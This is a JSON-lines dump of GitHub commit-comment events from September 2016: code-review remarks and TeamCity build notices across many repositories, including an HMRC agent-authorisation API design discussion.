{"id":"4617345744","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171116,"position":28,"line":28,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:02:15Z","updated_at":"2016-09-26T12:02:15Z","body":"I'm also uncertain about whether agentName should be present--the only use case I can see for it is it allows software to say \"Joe Bloggs from DDCW Accounting Ltd would like to represent you for _ tax\" instead of \"DDCW Accounting Ltd would like to represent you. \r\n\r\nTo your second point, yes, and yes. =)"}},"created_at":"2016-09-26T12:02:15Z"}
{"id":"4617346244","type":"CommitCommentEvent","actor":{"login":"burczu"},"repo":{"name":"burczu/react-router-role-authorization"},"payload":{"comment":{"id":19171120,"position":5,"line":14,"path":"lib/components/AuthorizedForComponent.react.js","commit_id":"e0ef15dc308b1d47ee30d4d9ec3e60af791f1c04","created_at":"2016-09-26T12:02:23Z","updated_at":"2016-09-26T12:02:23Z","body":"Ok ;) now it won't throw an exception... but still it won't work as intended - the intention of `this.userRoles` is the place where you tell the lib what are the user roles - they should be taken from the server during the login process and saved in the cookie. So the `this.rolesMatched` method compares `this.allowedRoles` and `this.userRoles` and returns `true` it they match or `false` if they don't. What you have to do is to provide a way to put real user roles to the `this.userRoles` array."}},"created_at":"2016-09-26T12:02:23Z"}
{"id":"4617346472","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171121,"position":null,"line":null,"path":null,"commit_id":"4922d00dfe5df7e147b9bbffde80d5de9e936ef8","created_at":"2016-09-26T12:02:27Z","updated_at":"2016-09-26T12:02:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 64](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14235&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-26T12:02:27Z"}
{"id":"4617347293","type":"CommitCommentEvent","actor":{"login":"zstadler"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19171126,"position":233,"line":1067,"path":"IsrealHiking.Web/controllers/InfoController.ts","commit_id":"f4f87ff76f1b6249992be477664c9ed09d81cd01","created_at":"2016-09-26T12:02:41Z","updated_at":"2016-09-26T12:02:41Z","body":"I understand you had user-defined maps in mind. for the else clause. With this intention in mind, the entire legend should be shown.\r\n\r\nThe user added, for example, Mapnik or OpenCycleMap, then the legend had better show how each map shows cycle routes, the various tracktype grades, etc.\r\n\r\nIf the user map does not show a specific map element, then the legend will show how it is ignored."}},"created_at":"2016-09-26T12:02:41Z"}
{"id":"4617349918","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171136,"position":52,"line":52,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:03:25Z","updated_at":"2016-09-26T12:03:25Z","body":"It should, yes."}},"created_at":"2016-09-26T12:03:25Z"}
{"id":"4617350265","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"ctolon22/lab1-git-race"},"payload":{"comment":{"id":19171137,"position":null,"line":null,"path":null,"commit_id":"0e992918e24dae7894df979cfff573ecc3de0d81","created_at":"2016-09-26T12:03:31Z","updated_at":"2016-09-26T12:03:31Z","body":":+1: That's the idea"}},"created_at":"2016-09-26T12:03:31Z"}
{"id":"4617350615","type":"CommitCommentEvent","actor":{"login":"bacharakis"},"repo":{"name":"techministry/new_website"},"payload":{"comment":{"id":19171138,"position":4,"line":238,"path":"src/scss/creative.scss","commit_id":"778af08b522a66f091c5fc92e4b19b548d292d6f","created_at":"2016-09-26T12:03:37Z","updated_at":"2016-09-26T12:03:37Z","body":"thanks for the tip"}},"created_at":"2016-09-26T12:03:37Z"}
{"id":"4617353818","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"ctolon22/lab1-git-race"},"payload":{"comment":{"id":19171149,"position":null,"line":null,"path":null,"commit_id":"d61591b74830aca32d2432ec1772e1f5da3cacf5","created_at":"2016-09-26T12:04:32Z","updated_at":"2016-09-26T12:04:32Z","body":"Much better!"}},"created_at":"2016-09-26T12:04:32Z"}
{"id":"4617354379","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171151,"position":null,"line":null,"path":null,"commit_id":"4922d00dfe5df7e147b9bbffde80d5de9e936ef8","created_at":"2016-09-26T12:04:42Z","updated_at":"2016-09-26T12:04:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 64](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14235&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:02:14"}},"created_at":"2016-09-26T12:04:42Z"}
{"id":"4617354899","type":"CommitCommentEvent","actor":{"login":"joker-01"},"repo":{"name":"joker-01/repository-02"},"payload":{"comment":{"id":19171153,"position":null,"line":null,"path":null,"commit_id":"e7a331c44d6f1260e93faae19ff1b331f5b8a0aa","created_at":"2016-09-26T12:04:50Z","updated_at":"2016-09-26T12:04:50Z","body":"print(\"hello world!\")"}},"created_at":"2016-09-26T12:04:50Z"}
{"id":"4617355730","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171155,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:05:04Z","updated_at":"2016-09-26T12:05:04Z","body":"I considered traits, yes. If the API were more complex, I'd refactor. \r\n\r\nRe: 401 vs 403, I couldn't come up with a case, given the URL structure, where 403 would be appropriate. "}},"created_at":"2016-09-26T12:05:04Z"}
{"id":"4617358068","type":"CommitCommentEvent","actor":{"login":"burczu"},"repo":{"name":"burczu/react-router-role-authorization"},"payload":{"comment":{"id":19171157,"position":5,"line":14,"path":"lib/components/AuthorizedForComponent.react.js","commit_id":"e0ef15dc308b1d47ee30d4d9ec3e60af791f1c04","created_at":"2016-09-26T12:05:42Z","updated_at":"2016-09-26T12:05:42Z","body":"please take a look at the example of the class which extends `RoleAwareComponent`:\r\n\r\n```JavaScript\r\nimport React from 'react';\r\nimport { RoleAwareComponent } from 'react-router-role-authorization';\r\nimport Cookies from 'js-cookie';\r\n\r\nclass BoxOne extends RoleAwareComponent {\r\n  constructor(props) {\r\n    super(props);\r\n\r\n    this.allowedRoles = ['user'];\r\n    this.userRoles = Cookies.get('user').roles;\r\n  }\r\n\r\n  render() {\r\n    const jsx = (\r\n      <div>\r\n        Box One\r\n      </div>\r\n    );\r\n\r\n    return this.rolesMatched() ? jsx : null;\r\n  }\r\n}\r\n\r\nexport default BoxOne;\r\n```\r\n\r\nin the constructor you have:\r\n\r\n```JavaScript\r\nthis.userRoles = Cookies.get('user').roles;\r\n```\r\n\r\nThe way how user roles are stored should be left for the developer which uses this library."}},"created_at":"2016-09-26T12:05:42Z"}
{"id":"4617360371","type":"CommitCommentEvent","actor":{"login":"Lennoard"},"repo":{"name":"woow1225/HEBF"},"payload":{"comment":{"id":19171167,"position":null,"line":null,"path":null,"commit_id":"f2d95de5ae70cd84fdd722b7d22a70e5b36d3490","created_at":"2016-09-26T12:06:22Z","updated_at":"2016-09-26T12:06:22Z","body":"Thank you!"}},"created_at":"2016-09-26T12:06:22Z"}
{"id":"4617360374","type":"CommitCommentEvent","actor":{"login":"vjt"},"repo":{"name":"ifad/eaco"},"payload":{"comment":{"id":19171168,"position":null,"line":null,"path":null,"commit_id":"64950b25cccee3a674b5af42af5a17871e801803","created_at":"2016-09-26T12:06:22Z","updated_at":"2016-09-26T12:06:22Z","body":"Good!"}},"created_at":"2016-09-26T12:06:22Z"}
{"id":"4617361120","type":"CommitCommentEvent","actor":{"login":"ziyeZzz"},"repo":{"name":"ziyeZzz/lapio-galleria"},"payload":{"comment":{"id":19171171,"position":null,"line":null,"path":null,"commit_id":"19f81a18a11009539f803dcff6df8f37a7c6da26","created_at":"2016-09-26T12:06:34Z","updated_at":"2016-09-26T12:06:34Z","body":"Add my-info"}},"created_at":"2016-09-26T12:06:34Z"}
{"id":"4617365657","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19171177,"position":null,"line":null,"path":null,"commit_id":"ff08b658e9ec60ac7d64d0d6450922502e1d4b03","created_at":"2016-09-26T12:07:50Z","updated_at":"2016-09-26T12:07:50Z","body":"I did it in e35040f2e05668c483dab25bd6f9c617b6e7cf3e."}},"created_at":"2016-09-26T12:07:50Z"}
{"id":"4617375730","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19171202,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T12:10:32Z","updated_at":"2016-09-26T12:10:32Z","body":"OK, je fait ça."}},"created_at":"2016-09-26T12:10:32Z"}
{"id":"4617376697","type":"CommitCommentEvent","actor":{"login":"HarelM"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19171204,"position":233,"line":1067,"path":"IsrealHiking.Web/controllers/InfoController.ts","commit_id":"f4f87ff76f1b6249992be477664c9ed09d81cd01","created_at":"2016-09-26T12:10:48Z","updated_at":"2016-09-26T12:10:48Z","body":"Sounds reasonable, you can remove the else clause then when you check in the changes Guy wanted...?"}},"created_at":"2016-09-26T12:10:48Z"}
{"id":"4617386514","type":"CommitCommentEvent","actor":{"login":"binarywang"},"repo":{"name":"wechat-group/weixin-java-tools"},"payload":{"comment":{"id":19171216,"position":null,"line":null,"path":null,"commit_id":"b7e8f2129d678ab5b099f1da448f1c932c83cd4c","created_at":"2016-09-26T12:12:38Z","updated_at":"2016-09-26T12:12:38Z","body":"for #17 "}},"created_at":"2016-09-26T12:12:38Z"}
{"id":"4617397655","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171230,"position":28,"line":28,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:14:35Z","updated_at":"2016-09-26T12:14:35Z","body":"I think that there is an unresolved tension that the UI design talks in terms of individual agents (i.e. Geoff) because that's what the design team think that the customers want, and the back end talks in terms of agencies because that avoids the problems that having a delegation model in HMRC/GG's systems brings"}},"created_at":"2016-09-26T12:14:35Z"}
{"id":"4617398759","type":"CommitCommentEvent","actor":{"login":"vjt"},"repo":{"name":"ifad/eaco"},"payload":{"comment":{"id":19171233,"position":null,"line":null,"path":null,"commit_id":"64950b25cccee3a674b5af42af5a17871e801803","created_at":"2016-09-26T12:14:48Z","updated_at":"2016-09-26T12:14:48Z","body":"However, sorry, we currently use coveralls for coverage, not code_climate. \r\n\r\nIt may be worth to move both code quality and coverage to code_climate, if you agree feel free to do it."}},"created_at":"2016-09-26T12:14:48Z"}
{"id":"4617399198","type":"CommitCommentEvent","actor":{"login":"nojhamster"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":19171235,"position":5,"line":9,"path":"test/istex-genre-test.js","commit_id":"53413b507f09c2640a8f32cf2438c493963a353e","created_at":"2016-09-26T12:14:54Z","updated_at":"2016-09-26T12:14:54Z","body":"Pourquoi cette ligne a nécessité deux changements à la suite ? Attention à ne pas commiter à l'aveugle, il suffit de lancer le test !"}},"created_at":"2016-09-26T12:14:54Z"}
{"id":"4617399427","type":"CommitCommentEvent","actor":{"login":"DerouineauNicolas"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19171238,"position":16,"line":3314,"path":"applications/mp4box/main.c","commit_id":"a2977a85cba372d659a1a154fe7c132a166ff9a8","created_at":"2016-09-26T12:14:56Z","updated_at":"2016-09-26T12:14:56Z","body":"Yes this makes sense. It's already done for mpu_asset_id_value, I'll extend this to the other variables. \r\nAgreed for the memory allocation."}},"created_at":"2016-09-26T12:14:56Z"}
{"id":"4617404089","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171252,"position":92,"line":92,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:15:55Z","updated_at":"2016-09-26T12:15:55Z","body":"I vaguely remember that, and it certainly makes sense. I'll add that."}},"created_at":"2016-09-26T12:15:55Z"}
{"id":"4617405214","type":"CommitCommentEvent","actor":{"login":"amerdidit"},"repo":{"name":"boyvinall/hydra"},"payload":{"comment":{"id":19171254,"position":null,"line":null,"path":null,"commit_id":"80ba11a065873795d57410e00761ad543648b837","created_at":"2016-09-26T12:16:10Z","updated_at":"2016-09-26T12:16:10Z","body":"good stuff 👍 "}},"created_at":"2016-09-26T12:16:10Z"}
{"id":"4617405948","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171255,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:16:20Z","updated_at":"2016-09-26T12:16:20Z","body":"Ah I see - you wouldn't be able to navigate the hyperlinks and get a 403. We will probably still have code that returns a 403 if you're logged in and you try to access someone else's invitation, right?"}},"created_at":"2016-09-26T12:16:20Z"}
{"id":"4617408194","type":"CommitCommentEvent","actor":{"login":"fabianmoronzirfas"},"repo":{"name":"basiljs/basil.js"},"payload":{"comment":{"id":19171261,"position":null,"line":null,"path":null,"commit_id":"022bbd71349e7f869bd44e7a27ba2e2094bab9de","created_at":"2016-09-26T12:16:47Z","updated_at":"2016-09-26T12:16:47Z","body":"👍  Thank you."}},"created_at":"2016-09-26T12:16:47Z"}
{"id":"4617412221","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19171267,"position":25,"line":25,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T12:17:32Z","updated_at":"2016-09-26T12:17:32Z","body":"len || 2 \r\n这个处理没有必要了吧"}},"created_at":"2016-09-26T12:17:32Z"}
{"id":"4617414053","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19171273,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-26T12:17:53Z","updated_at":"2016-09-26T12:17:53Z","body":"@flexiondotorg: do you mean using ```cpufreq_cpu_exists``` only? Yes, it builds with that. Unfortunately, I only have systems with newer kernels in VMs, so I can't check if the applet works (it never worked in a VM)."}},"created_at":"2016-09-26T12:17:53Z"}
{"id":"4617415322","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"ptomin/reko"},"payload":{"comment":{"id":19171277,"position":null,"line":null,"path":null,"commit_id":"0637b9a3949865f11d265c9f1c3e91e5f9e563ab","created_at":"2016-09-26T12:18:06Z","updated_at":"2016-09-26T12:18:06Z","body":"Pavel, could you explain to me how you're thinking in this case? I'm failing to understand how generating `fp-INVALID` is going to get you any further."}},"created_at":"2016-09-26T12:18:06Z"}
{"id":"4617424528","type":"CommitCommentEvent","actor":{"login":"qdp-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19171303,"position":4,"line":101,"path":"addons/account/views/account_payment_view.xml","commit_id":"c055e64535510333f3a59483d4b15db26a227eaf","created_at":"2016-09-26T12:19:51Z","updated_at":"2016-09-26T12:19:51Z","body":"nope... the idea was to filter out based on the partner_type field.\r\n\r\nSo, if I select 'customer' in partner_type I should see only partner with customer=True\r\nand, if I select 'supplier' in partner_type I should see only partner with supplier=True\r\n"}},"created_at":"2016-09-26T12:19:51Z"}
{"id":"4617424552","type":"CommitCommentEvent","actor":{"login":"qdp-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19171304,"position":4,"line":101,"path":"addons/account/views/account_payment_view.xml","commit_id":"c055e64535510333f3a59483d4b15db26a227eaf","created_at":"2016-09-26T12:19:51Z","updated_at":"2016-09-26T12:19:51Z","body":"nope... the idea was to filter out based on the partner_type field.\r\n\r\nSo, if I select 'customer' in partner_type I should see only partner with customer=True\r\nand, if I select 'supplier' in partner_type I should see only partner with supplier=True\r\n"}},"created_at":"2016-09-26T12:19:51Z"}
{"id":"4617429755","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171314,"position":45,"line":45,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:20:49Z","updated_at":"2016-09-26T12:20:49Z","body":"I'd much rather just have 200, yes. Thought I'd best stick with the architect's 'best practice' though."}},"created_at":"2016-09-26T12:20:49Z"}
{"id":"4617434167","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19171338,"position":144,"line":144,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T12:21:44Z","updated_at":"2016-09-26T12:21:44Z","body":"couponDataLen 这个不是全局变量，这样直接使用会不会有问题"}},"created_at":"2016-09-26T12:21:44Z"}
{"id":"4617450920","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19171373,"position":164,"line":164,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T12:25:17Z","updated_at":"2016-09-26T12:25:17Z","body":"传递进来的参数只使用了一个就是opts.currentTab，感觉参数没有必要封装成对象，直接传currentTab就行了"}},"created_at":"2016-09-26T12:25:17Z"}
{"id":"4617453271","type":"CommitCommentEvent","actor":{"login":"adiraomj"},"repo":{"name":"siteorigin/siteorigin-north"},"payload":{"comment":{"id":19171383,"position":null,"line":null,"path":null,"commit_id":"12a217fa27d37d4e671a1e36bb8cf5f1db3a2dea","created_at":"2016-09-26T12:25:49Z","updated_at":"2016-09-26T12:25:49Z","body":"@gregpriday I tested this code. However, it only works when the setting is prefixed with `theme_settings_`.\r\n\r\nSo for the code to work I have to use `$settings['theme_settings_structure_sidebar_width']` and `$settings['theme_settings_responsive_menu_breakpoint']`."}},"created_at":"2016-09-26T12:25:49Z"}
{"id":"4617456324","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19171388,"position":45,"line":45,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T12:26:30Z","updated_at":"2016-09-26T12:26:30Z","body":"Yes, it basically relies on unbreakable group consensus - or on the network's ability to fix broken groups. But currently we don't have an RFC for either of those, I think. I'll add the links here as soon as we do."}},"created_at":"2016-09-26T12:26:30Z"}
{"id":"4617456369","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19171389,"position":37,"line":37,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T12:26:30Z","updated_at":"2016-09-26T12:26:30Z","body":"I added the option to use the last hash. In fact, with link blocks, any old, hashed value should be sufficient to validate the group."}},"created_at":"2016-09-26T12:26:30Z"}
{"id":"4617456598","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19171391,"position":30,"line":30,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T12:26:33Z","updated_at":"2016-09-26T12:26:33Z","body":"I agree, that's just an example. I put a section about it in \"Unresolved questions\"."}},"created_at":"2016-09-26T12:26:33Z"}
{"id":"4617457017","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19171394,"position":186,"line":186,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T12:26:39Z","updated_at":"2016-09-26T12:26:39Z","body":"没有return操作吗？那格式化的作用是什么"}},"created_at":"2016-09-26T12:26:39Z"}
{"id":"4617458650","type":"CommitCommentEvent","actor":{"login":"yuriy-yarosh"},"repo":{"name":"Nebo15/mbill.styles.web"},"payload":{"comment":{"id":19171403,"position":null,"line":null,"path":null,"commit_id":"622d2bcb3127ea94dcc47298f4b65296d029e825","created_at":"2016-09-26T12:27:01Z","updated_at":"2016-09-26T12:27:01Z","body":"Было бы неплохо ещё добавить каких-то статических анализаторов типа eslint / jscs / stylelint да слезть на node-sass или postcss с csscomb."}},"created_at":"2016-09-26T12:27:01Z"}
{"id":"4617460109","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19171416,"position":42,"line":88,"path":"docs/package.json","commit_id":"adb9a20f6518917b6e2d7c044729ddbd25d57512","created_at":"2016-09-26T12:27:20Z","updated_at":"2016-09-26T12:27:20Z","body":"webpack-* are currently not used by the boilerplate, but yeah we should add it, I just forget"}},"created_at":"2016-09-26T12:27:20Z"}
{"id":"4617461161","type":"CommitCommentEvent","actor":{"login":"nerdaliciousCH"},"repo":{"name":"nerdaliciousCH/recipes"},"payload":{"comment":{"id":19171420,"position":null,"line":null,"path":null,"commit_id":"37fb768860d1828bbffc968b0ba37bd3748dbc75","created_at":"2016-09-26T12:27:34Z","updated_at":"2016-09-26T12:27:34Z","body":"jaja good idea"}},"created_at":"2016-09-26T12:27:34Z"}
{"id":"4617465273","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19171430,"position":317,"line":317,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-26T12:28:28Z","updated_at":"2016-09-26T12:28:28Z","body":"this.$el 多次出现，可以先定义变量进行保存"}},"created_at":"2016-09-26T12:28:28Z"}
{"id":"4617466131","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171432,"position":null,"line":null,"path":null,"commit_id":"8be58ff82704ce5f16ae9230ab609eb27e2c7c39","created_at":"2016-09-26T12:28:39Z","updated_at":"2016-09-26T12:28:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1161](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14237&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T12:28:39Z"}
{"id":"4617466487","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171433,"position":null,"line":null,"path":null,"commit_id":"8be58ff82704ce5f16ae9230ab609eb27e2c7c39","created_at":"2016-09-26T12:28:45Z","updated_at":"2016-09-26T12:28:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1161](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14237&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:05"}},"created_at":"2016-09-26T12:28:45Z"}
{"id":"4617466523","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19171434,"position":null,"line":null,"path":null,"commit_id":"29fa42274b4fe51d3ffdd295920688cb248a4fb2","created_at":"2016-09-26T12:28:46Z","updated_at":"2016-09-26T12:28:46Z","body":"At the end, it's a bug due to babel-loader which does not invalidate the cache when config changes... I cried for a minute... (without the cache, you understand the error pretty quickly...)"}},"created_at":"2016-09-26T12:28:46Z"}
{"id":"4617469262","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"jacob4684/Character"},"payload":{"comment":{"id":19171439,"position":21,"line":21,"path":"Game/Character.cs","commit_id":"ad1b415ab7e040907a3fdbf5e4fec1dd83c8bba2","created_at":"2016-09-26T12:29:20Z","updated_at":"2016-09-26T12:29:20Z","body":"Skriv summariea til alle members i classen."}},"created_at":"2016-09-26T12:29:20Z"}
{"id":"4617471465","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171445,"position":34,"line":34,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:29:49Z","updated_at":"2016-09-26T12:29:49Z","body":"Changed. Also added the docs for the mtdArn uriParameter."}},"created_at":"2016-09-26T12:29:49Z"}
{"id":"4617472025","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171447,"position":null,"line":null,"path":null,"commit_id":"8be58ff82704ce5f16ae9230ab609eb27e2c7c39","created_at":"2016-09-26T12:29:55Z","updated_at":"2016-09-26T12:29:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1162](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14243&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T12:29:55Z"}
{"id":"4617472577","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19171449,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-26T12:30:03Z","updated_at":"2016-09-26T12:30:03Z","body":"So, you're basically saying we should state:\r\n\r\n> The initiator MUST drop inactive responders. To achieve that, the initiator MAY drop responders that have not sent any messages to the initiator after 60 seconds.\r\n\r\nThat would leave some room for the implementation, right?"}},"created_at":"2016-09-26T12:30:03Z"}
{"id":"4617477504","type":"CommitCommentEvent","actor":{"login":"wisd81"},"repo":{"name":"simonepizza93/stefano-test"},"payload":{"comment":{"id":19171460,"position":143,"line":143,"path":"index.html","commit_id":"79ace9b1096363639c6564feb9b37149a7531705","created_at":"2016-09-26T12:31:01Z","updated_at":"2016-09-26T12:31:01Z","body":"Non sbagli, ma il motivo principale è che applicando stile direttamente a un tag (div oppure p ad esempio) senza classe stai applicandola a tutti gli stessi tag a cui quel CSS è applicato. Per poter dare uno stile diverso a un diverso <div> o <p> tag nella pagina dovrai sovrascrivere in qualche modo quello stile. Ed ecco che entriamo in uno degli argomenti piú importanti del CSS. La specificità."}},"created_at":"2016-09-26T12:31:01Z"}
{"id":"4617483806","type":"CommitCommentEvent","actor":{"login":"jbtibor"},"repo":{"name":"jbtibor/SmartThings"},"payload":{"comment":{"id":19171481,"position":null,"line":null,"path":null,"commit_id":"b01bc785d410450ad3e91f6c4aa374e8d5ad78d9","created_at":"2016-09-26T12:32:29Z","updated_at":"2016-09-26T12:32:29Z","body":"Hi @alexmesa987, first you have to link blinds in your TaHoma account either in mobile app or on website.\r\nhttps://play.google.com/store/apps/details?id=com.somfy.tahoma\r\n\r\nAfter that follow the guided setup in SmartThings and select which roller shutters to control."}},"created_at":"2016-09-26T12:32:29Z"}
{"id":"4617484509","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171485,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T12:32:38Z","updated_at":"2016-09-26T12:32:38Z","body":"I'd expect a 404 as that invitation wouldn't be a sub-resource of this agency."}},"created_at":"2016-09-26T12:32:38Z"}
{"id":"4617484557","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"ptomin/reko"},"payload":{"comment":{"id":19171486,"position":null,"line":null,"path":null,"commit_id":"0637b9a3949865f11d265c9f1c3e91e5f9e563ab","created_at":"2016-09-26T12:32:39Z","updated_at":"2016-09-26T12:32:39Z","body":"if `esp` is Constant.Invalid it's not possible to bind local variables so Reko generates something like `*(esp_71 - 8)=0x10`. If `esp` is `fp-0x0BADCAFE` then it generates `dwLoc0x0BADCAF8`. See difference of VCExeSample https://github.com/ptomin/reko/commit/0637b9a3949865f11d265c9f1c3e91e5f9e563ab#diff-c272b436bf8a769a5ef9459948936670"}},"created_at":"2016-09-26T12:32:39Z"}
{"id":"4617486362","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19171487,"position":6,"line":0,"path":"libraries/stdlib/src/kotlin/util/KotlinVersion.kt","commit_id":"5e70ebede1a0993dd2d5b2ae03ee6c73062dc652","created_at":"2016-09-26T12:33:01Z","updated_at":"2016-09-26T12:33:01Z","body":"Default parameters doesn't come for free.\nI'd like to have overloads with 3 and 2 parameters, not with 3 and 5."}},"created_at":"2016-09-26T12:33:01Z"}
